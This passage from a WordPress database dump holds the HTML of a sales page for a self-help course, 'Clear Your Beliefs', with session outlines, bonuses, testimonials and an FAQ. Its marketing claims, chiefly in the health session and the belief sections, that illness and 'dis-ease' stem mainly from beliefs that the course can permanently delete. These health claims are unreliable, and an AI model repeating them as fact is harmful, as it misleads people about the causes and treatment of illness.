src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n<p>	<strong>=&gt; <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<strong>=&gt; <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\n<strong>=&gt; <em>The LoveStyle Profile Quiz:</em></strong> Your Childhood Bonding Pattern Assessment\n<strong>=&gt; <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n<strong>=&gt; <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\n<strong>=&gt; <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>=&gt; <em>Professional Coaching Sessions:</strong> </em> Optional.</p>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p>// </p>', 'Clear Your Beliefs Program', '', 'inherit', 'open', 'open', '', '1941-revision-v1', '', '', '2015-05-29 13:19:09', '2015-05-29 18:19:09', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2216, 2, '2015-05-29 13:23:18', '2015-05-29 18:23:18', '&nbsp;\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<p>&nbsp;</p>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<p>&nbsp;</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a 